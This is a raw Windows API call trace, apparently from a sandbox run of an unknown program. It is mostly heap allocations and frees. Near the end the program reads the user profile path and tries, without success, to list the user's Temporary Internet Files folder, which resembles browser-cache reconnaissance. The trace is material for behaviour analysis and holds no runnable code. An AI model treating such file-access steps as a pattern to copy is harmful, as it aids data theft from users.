| out: hHeap=0x25c0000) returned 1 [0251.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0251.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0251.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0251.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa778 [0251.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0251.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0251.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0251.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0251.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0251.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0251.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0251.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0251.340] CloseHandle (hObject=0x1f8) returned 1 [0251.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0251.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0251.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0251.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0251.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0251.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0251.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0251.341] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0251.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0251.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0251.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0251.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0251.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0251.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0251.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0251.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0251.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0251.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0251.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0251.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0251.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0251.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0251.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0251.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0251.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0251.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0251.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0251.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0251.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0251.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0251.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0251.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0251.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0251.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0251.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0251.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0251.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0251.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0251.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0251.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0251.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0251.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0251.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0251.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0251.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0251.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0251.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0251.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0251.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0251.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0251.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0251.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0251.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0251.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0251.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0251.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0251.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0251.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0251.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0251.345] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0251.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0251.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0251.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0251.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0251.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0251.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0251.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0251.346] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0251.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0251.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0251.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0251.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0251.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0251.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0251.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0251.346] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0251.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0251.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0251.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0251.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0251.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0251.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0251.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0251.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0251.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0251.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0251.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0251.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0251.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0251.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0251.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0251.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8a) returned 0x24208b8 [0251.348] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Temporary Internet Files", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files", lpFilePart=0x8bedfc*="Temporary Internet Files") returned 0x44 [0251.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24208b8 | out: hHeap=0x25c0000) returned 1 [0251.348] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files")) returned 0x2416 [0251.348] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x25c0000, ftCreationTime.dwLowDateTime=0x4a82e4, ftCreationTime.dwHighDateTime=0x1610011, ftLastAccessTime.dwLowDateTime=0x11da, ftLastAccessTime.dwHighDateTime=0x3e40031, ftLastWriteTime.dwLowDateTime=0x137bf, ftLastWriteTime.dwHighDateTime=0x4a8178, nFileSizeHigh=0x74f605ba, nFileSizeLow=0x25c6d68, dwReserved0=0x11da, dwReserved1=0x4, cFileName="", cAlternateFileName="")) returned 0xffffffff [0251.349] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0251.349] GetLastError () returned 0x6 [0251.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0251.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0251.349] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0251.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0251.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0251.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0251.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0251.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0251.349] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0251.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0251.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0251.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0251.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0251.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0251.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0251.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0251.350] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0251.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0251.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0251.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0251.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0251.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0251.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0251.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0251.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0251.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0251.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0251.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0251.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0251.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0251.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 